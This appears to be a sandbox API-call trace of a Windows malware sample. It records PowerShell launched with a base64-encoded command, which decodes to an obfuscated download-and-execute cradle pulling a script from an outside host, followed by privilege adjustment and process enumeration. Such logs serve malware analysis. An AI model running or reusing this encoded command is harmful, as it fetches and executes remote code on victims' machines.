	[0402.942] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7ae200*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fd95d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2fd95d0*(hProcess=0x36c, hThread=0x368, dwProcessId=0x1210, dwThreadId=0xd8c)) returned 1
	[0403.389] CoTaskMemFree (pv=0x1243b0) 
	[0403.390] CloseHandle (hObject=0x368) returned 1
	[0403.390] CoTaskMemAlloc (cb=0x3b) returned 0x1b79bc30
	[0403.390] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae2a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae2a8) returned 0x4550
	[0403.391] CoTaskMemFree (pv=0x1b79bc30) 
	[0403.393] GetCurrentProcess () returned 0xffffffffffffffff
	[0403.393] GetCurrentProcess () returned 0xffffffffffffffff
	[0403.394] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ae388, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ae388*=0x368) returned 1

Process:
	id = "27"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1c18b000"
	os_pid = "0x5b4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 153
	os_tid = 0x8a8

	[0505.377] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0507.790] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0507.791] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0507.791] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0507.791] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0510.662] sprintf_s (in: _DstBuf=0xcee38, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0511.943] GetVersionExW (in: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0511.945] GetVersionExW (in: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0512.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0512.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0512.575] GetVersionExW (in: lpVersionInformation=0xcd6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0512.576] SetErrorMode (uMode=0x1) returned 0x1
	[0512.577] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd810 | out: lpFileInformation=0xcd810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0512.578] SetErrorMode (uMode=0x1) returned 0x1
	[0512.581] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcda80 | out: lpdwHandle=0xcda80) returned 0x94c
	[0512.583] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bd72d8 | out: lpData=0x2bd72d8) returned 1
	[0512.585] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd9f8, puLen=0xcd9f0 | out: lplpBuffer=0xcd9f8*=0x2bd7374, puLen=0xcd9f0) returned 1
	[0512.588] lstrlenW (lpString="䅁") returned 1
	[0512.597] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd7450, puLen=0xcd960) returned 1
	[0512.598] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0512.600] CoTaskMemAlloc (cb=0x2e) returned 0x2b7aa0
	[0512.600] lstrcpyW (in: lpString1=0x2b7aa0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0512.601] CoTaskMemFree (pv=0x2b7aa0) 
	[0512.601] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd74a4, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="System.Management.Automation") returned 28
	[0512.602] CoTaskMemAlloc (cb=0x3c) returned 0x2b4b30
	[0512.602] lstrcpyW (in: lpString1=0x2b4b30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0512.602] CoTaskMemFree (pv=0x2b4b30) 
	[0512.602] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd7500, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0512.602] CoTaskMemAlloc (cb=0x20) returned 0x2b5bf0
	[0512.602] lstrcpyW (in: lpString1=0x2b5bf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0512.602] CoTaskMemFree (pv=0x2b5bf0) 
	[0512.602] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd7540, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0512.602] CoTaskMemAlloc (cb=0x44) returned 0x2b4b30
	[0512.602] lstrcpyW (in: lpString1=0x2b4b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0512.602] CoTaskMemFree (pv=0x2b4b30) 
	[0512.602] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd75a8, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0512.602] CoTaskMemAlloc (cb=0x76) returned 0x244ad0
	[0512.602] lstrcpyW (in: lpString1=0x244ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0512.602] CoTaskMemFree (pv=0x244ad0) 
	[0512.602] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd7644, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0512.602] CoTaskMemAlloc (cb=0x44) returned 0x2b4b30
	[0512.602] lstrcpyW (in: lpString1=0x2b4b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0512.602] CoTaskMemFree (pv=0x2b4b30) 
	[0512.602] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd76a8, puLen=0xcd960) returned 1
	[0512.602] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0512.602] CoTaskMemAlloc (cb=0x58) returned 0x1f57a0
	[0512.602] lstrcpyW (in: lpString1=0x1f57a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0512.602] CoTaskMemFree (pv=0x1f57a0) 
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd7724, puLen=0xcd960) returned 1
	[0512.603] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0512.603] CoTaskMemAlloc (cb=0x20) returned 0x2b5bf0
	[0512.603] lstrcpyW (in: lpString1=0x2b5bf0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0512.603] CoTaskMemFree (pv=0x2b5bf0) 
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x2bd73cc, puLen=0xcd960) returned 1
	[0512.603] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0512.603] CoTaskMemAlloc (cb=0x66) returned 0x20b990
	[0512.603] lstrcpyW (in: lpString1=0x20b990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0512.603] CoTaskMemFree (pv=0x20b990) 
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x0, puLen=0xcd960) returned 0
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x0, puLen=0xcd960) returned 0
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd968, puLen=0xcd960 | out: lplpBuffer=0xcd968*=0x0, puLen=0xcd960) returned 0
	[0512.603] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd938, puLen=0xcd930 | out: lplpBuffer=0xcd938*=0x2bd7374, puLen=0xcd930) returned 1
	[0513.239] CoTaskMemAlloc (cb=0x204) returned 0x23c970
	[0513.239] VerLanguageNameW (in: wLang=0x0, szLang=0x23c970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0513.240] CoTaskMemFree (pv=0x23c970) 
	[0513.240] VerQueryValueW (in: pBlock=0x2bd72d8, lpSubBlock="\\", lplpBuffer=0xcd988, puLen=0xcd980 | out: lplpBuffer=0xcd988*=0x2bd7300, puLen=0xcd980) returned 1
	[0513.246] GetCurrentProcessId () returned 0x5b4
	[0513.263] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcc8b0 | out: lpLuid=0xcc8b0*(LowPart=0x14, HighPart=0)) returned 1
	[0513.266] GetCurrentProcess () returned 0xffffffffffffffff
	[0513.266] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcc8d0 | out: TokenHandle=0xcc8d0*=0x2e8) returned 1
	[0513.267] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2bdab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0513.269] CloseHandle (hObject=0x2e8) returned 1
	[0513.273] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5b4) returned 0x2e8
	[0514.468] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2bdabb8, cb=0x200, lpcbNeeded=0xcd8e8 | out: lphModule=0x2bdabb8, lpcbNeeded=0xcd8e8) returned 1
	[0514.470] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2bdae28, cb=0x18 | out: lpmodinfo=0x2bdae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0514.471] CoTaskMemAlloc (cb=0x804) returned 0x2bee30
	[0514.471] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x2bee30, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0514.471] CoTaskMemFree (pv=0x2bee30) 
	[0514.472] CoTaskMemAlloc (cb=0x804) returned 0x2bee30
	[0514.472] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x2bee30, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0514.472] CoTaskMemFree (pv=0x2bee30) 
	[0514.473] CloseHandle (hObject=0x2e8) returned 1
	[0514.482] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x5b4) returned 0x2e8
	[0514.483] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0xcda18 | out: lpExitCode=0xcda18*=0x103) returned 1
	[0514.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bdb088, Length=0x20000, ResultLength=0xcd9e0 | out: SystemInformation=0x12bdb088, ResultLength=0xcd9e0*=0x2f928) returned 0xc0000004
	[0514.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bfb0b8, Length=0x32128, ResultLength=0xcd9e0 | out: SystemInformation=0x12bfb0b8, ResultLength=0xcd9e0*=0x2f928) returned 0x0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x558
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x538
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.504] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x778
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x778
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.505] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x460
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12a4
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1740
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16c4
	[0514.506] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1820
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16ac
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1858
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1664
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10b4
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10ac
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10ec
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1068
	[0515.819] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x17e0
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x102c
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x17a4
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1050
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1694
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1770
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1720
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x165c
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1578
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16c0
	[0515.820] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x161c
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1638
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x15c8
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1554
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1674
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1520
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x14bc
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xf8c
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe9c
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1434
	[0515.821] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x14ec
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xfcc
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12ac
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1484
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x934
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc0c
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb08
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x948
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1178
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13e0
	[0515.822] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xcd0
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13fc
